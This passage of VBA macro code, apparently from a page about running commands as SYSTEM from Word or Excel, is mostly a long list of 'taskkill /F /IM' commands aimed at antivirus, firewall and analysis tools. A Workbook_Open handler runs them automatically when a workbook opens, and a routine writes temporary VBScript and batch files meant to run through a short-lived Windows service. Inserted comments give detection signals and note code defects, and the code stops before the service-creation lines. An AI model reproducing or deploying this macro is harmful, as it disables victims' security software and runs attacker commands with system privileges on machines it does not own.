Build_Cmd_List arrayCmds, "taskkill /F /IM ""istsvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""jammer.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""jdbgmrg.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""jedi.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kavlite40eng.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kavpers40eng.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kavpf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kazza.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""keenvalue.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kerio-pf-213-en-win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kerio-wrl-421-en-win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kerio-wrp-421-en-win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""kernel32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""killprocesssetup161.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""launcher.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldnetmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldpro.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldpromenu.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lnetinfo.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""loader.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""localnet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lockdown.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lockdown2000.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lookout.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lordpe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luau.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lucomserver.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luinit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luspt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mapisvc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcagent.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcmnhdlr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcshield.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mctool.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcvsrte.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcvsshld.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""md.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mfin32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mfw2en.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mfweng3.02d30.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mgavrtcl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mgavrte.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mghtml.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mgui.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""minilog.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mmod.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""monitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""moolive.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mostat.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpfagent.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpfservice.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpftray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mrflux.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msapp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msbb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msblast.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mscache.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msccn32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mscman.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msconfig.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msdm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msdos.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msiexec16.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msinfo32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mslaugh.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msmgt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msmsgri32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mssmmc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mssys.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msvxd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mu0311ad.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""n32scanw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nav.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navap.navapsvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navapsvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navapw32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navdx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navlu32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navstub.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navw32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navwnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nc2000.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ncinst4.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ndd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""neomonitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""neowatchlog.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netarmor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netinfo.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netscanpro.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netspyhunter-1.2.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netstat.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netutils.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nisserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nisum.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nmain.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nod32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""normist.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""norton_internet_secu_3.0_407.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""notstart.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""npf40_tw_98_nt_me_2k.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""npfmessenger.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nprotect.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""npscheck.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""npssvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nsched32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nssys32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nstask32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nsupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ntrtscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ntvdm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ntxconfig.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nui.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nupgrade.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nupgrade.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvarch16.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvc95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvsvc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nwinst4.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nwservice.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nwtool16.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ollydbg.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""onsrvr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""optimize.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ostronet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""otfix.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpost.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpost.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpostinstall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpostproinstall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""padmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""panixk.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""patch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavcl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavproxy.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavsched.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcfwallicon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcip10117_0.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pdsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""periscope.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""persfw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""perswf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pf2.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pfwadmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pgmonitr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pingscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""platin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pop3trap.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""poproxy.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""popscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""portdetective.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""portmonitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""powerscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ppinupdt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pptbc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ppvstop.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""prizesurfer.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""prmt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""prmvr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""procdump.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""processmonitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""procexplorerv1.0.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""programauditor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""proport.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""protectx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pspf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""purge.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""qconsole.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""qserver.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rapapp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav8win32eng.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rb32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rcsync.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""realmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""reged.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""regedit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""regedt32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rescue.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rescue32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rrguard.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rshell.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rtvscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rtvscn95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rulaunch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""run32dll.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rundll.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rundll16.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ruxdll32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""safeweb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sahagent.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""save.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""savenow.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sbserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scam32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scanpm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scrscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""setup_flowprotector_us.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""setupvameeval.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sfc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sgssfw32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sh.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""shellspyinstall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""shn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""showbehind.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""smc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sms.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""smss32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""soap.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sofi.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sperm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""spf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sphinx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""spoler.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""spoolcv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""spoolsv32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""spyxx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""srexe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""srng.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ss3edit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ssg_4104.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ssgrate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""st2.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""start.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""stcloader.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""supftrl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""support.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""supporter5.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""svc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""svchostc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""svchosts.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""svshost.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sweep95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sweepnet.sweepsrv.sys.swnetsup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""symproxysvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""symtray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sysedit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""system.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""system32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sysupd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmg.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmgr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmo.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""taumon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tbscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tca.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tcm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds2-nt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds-3.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""teekids.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tfak.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tfak5.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tgbob.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""titanin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""titaninxp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tracert.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""trickler.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""trjscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""trjsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""trojantrap3.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tsadbot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tvmd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tvtmd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""undoboot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""updat.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""update.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""update.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""upgrad.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""utpost.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbcmserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbcons.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbust.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbwin9x.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbwinntw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vcsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vet32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vet95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vettray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vfsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vir-help.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""virusmdpersonalfirewall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vnlan300.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vnpc3000.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vpc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vpc42.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vpfw30s.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vptray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vscan40.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vscenu6.02d30.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsched.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsecomr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vshwin32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsisetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsmain.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsstat.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vswin9xe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vswinntse.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vswinperse.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""w32dsm89.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""w9x.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""watchdog.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""webdav.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""webscanx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""webtrap.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wfindv32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""whoswatchingme.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wimmun32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""win32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""win32us.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winactive.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""win-bugsfix.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""window.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""windows.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wininetd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wininit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wininitx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winlogin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winmain.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winnet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winppr32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winrecon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winservn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winssk32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winstart.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winstart001.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wintsk32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wkufind.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wnad.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wradmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wrctrl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wsbgate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wupdater.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wupdt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wyvernworksfirewall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""xpf202en.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zapro.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zapsetup3001.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zatutor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonalm2601.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonealarm.exe"""
Run_Sys_Cmds arrayCmds, INVISIBLE, WAIT
End Function
Call it with a simple:
' Workbook_Open is the Excel event handler that runs when the workbook is opened
' with macros enabled, so Kill_AV runs without any further user action.
' Defender note: Kill_AV queues a long list of "taskkill /F /IM <image>" commands
' and hands them to Run_Sys_Cmds. A burst of taskkill calls against security-product
' image names whose process ancestry leads back to an Office application is a strong
' detection signal, and blocking macros in untrusted documents stops it from running.
Sub Workbook_Open()
Kill_AV
End Sub
Running commands as SYSTEM from VBA in Word or Excel
' Run_Sys_Cmds: writes every element of arrayCmds into a batch file and runs that
' batch through a temporary Windows service.
'   arrayCmds       - collection of command strings, written one per line, unmodified
'   visibility      - window-style value embedded in the generated WScript.Shell.Run call
'   wait_on_execute - wait flag embedded in the same generated call
' The function assigns no return value.
' NOTE(review): fso, systemCmd, batchRun and cmd are never declared with Dim, so this
' only compiles when Option Explicit is off.
' NOTE(review): there is no error handling. If "sc create" fails (the page says it
' needs Administrator rights), the start/delete calls and the file clean-up still run.
' Defender note: artifacts left by this routine are %TEMP%\systemCmd.vbs,
' %TEMP%\systemBatch.bat, and a short-lived service named "systemCmd" whose binary
' path is "%COMSPEC% /c wscript ...". Service-install logging (Event ID 7045 in the
' System log on current Windows versions) records the service even though it is
' deleted right after use; sc.exe and wscript.exe descending from an Office process
' is a further signal.
Function Run_Sys_Cmds(arrayCmds As Variant, visibility, wait_on_execute)
Set fso = CreateObject("Scripting.FileSystemObject")
' Two helper files in the user's %TEMP%: a VBScript launcher and the batch it starts.
Set systemCmd = fso.CreateTextFile(Environ("TEMP") & "\systemCmd.vbs")
Set batchRun = fso.CreateTextFile(Environ("TEMP") & "\systemBatch.bat")
' The launcher is a single line: WScript.Shell.Run on the batch file, with the caller's
' visibility and wait values concatenated in as text.
systemCmd.WriteLine ("CreateObject(""Wscript.Shell"").Run """ & Environ("TEMP") & "\systemBatch.bat" & """, " & visibility & ", " & wait_on_execute)
' Commands are copied verbatim: no quoting, escaping or validation is applied.
For Each cmd In arrayCmds
batchRun.WriteLine (cmd)
Next cmd
systemCmd.Close
batchRun.Close
' Create, start and immediately delete the service. The page states that services
' run as SYSTEM unless told otherwise, which is why the batch runs at that level.
